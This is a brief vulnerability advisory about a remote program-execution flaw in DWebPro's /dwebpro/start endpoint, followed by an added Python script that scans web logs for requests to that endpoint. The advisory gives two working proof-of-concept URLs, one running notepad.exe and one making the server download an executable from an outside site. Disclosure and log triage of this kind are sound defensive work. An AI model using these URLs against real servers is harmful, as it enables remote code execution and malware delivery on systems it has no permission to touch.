
DWebPro allows an invader to execute any program on the server side



The latest version of DWebPro allows an invader to execute any program. Just request this URL in your browser:

http://127.0.0.1:8080/dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt

Notepad.exe will then open a text file called hi.txt in C:\ on the server side.

If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe, it will open a browser on the server side and download the file.

It's really dangerous.

I tested this on the latest version, but it may work on older versions as well.

Best Regards,

Rafael Sousa
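
For defenders reviewing a DWebPro host, the following added example (not part of the original advisory and not DWebPro code) scans web access logs for requests to the /dwebpro/start endpoint described above and labels the file= value for triage. The Common Log Format layout, the sample lines and all function names are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Common Log Format lines for illustration; not taken from the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /dwebpro/start?file=C:%5Cwindows%5Csystem32%5Cnotepad.exe&params=C:%5Chi.txt HTTP/1.1" 200 0
198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /DWebPro/Start?file=http://www.somesite.com.br/somefile.exe HTTP/1.1" 200 0
127.0.0.1 - - [01/Jan/2024:10:02:00 +0000] "GET /dwebpro/start?file=readme.txt HTTP/1.1" 200 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')
URL_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)
ABS_PATH_RE = re.compile(r'^(?:[a-z]:[\\/]|\\\\)', re.I)

def classify(value):
    """Label the file= value so remote URLs and absolute paths sort first in triage."""
    if URL_RE.match(value):
        return "remote-url"
    if ABS_PATH_RE.match(value):
        return "absolute-path"
    return "relative"

def is_loopback(client):
    try:
        return ipaddress.ip_address(client).is_loopback
    except ValueError:  # a hostname was logged instead of an address
        return False

def find_start_requests(log_text):
    """Return one record per request to /dwebpro/start that carries a file= parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        # Path compared case-insensitively (assumption: Windows host).
        if parts.path.lower().rstrip("/") != "/dwebpro/start":
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get("file", []):
            hits.append({"client": client, "from_loopback": is_loopback(client),
                         "file": value, "kind": classify(value),
                         "params": query.get("params", [""])[0]})
    return hits
```

Records where from_loopback is false deserve attention first, since they show the endpoint being reached from another machine.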
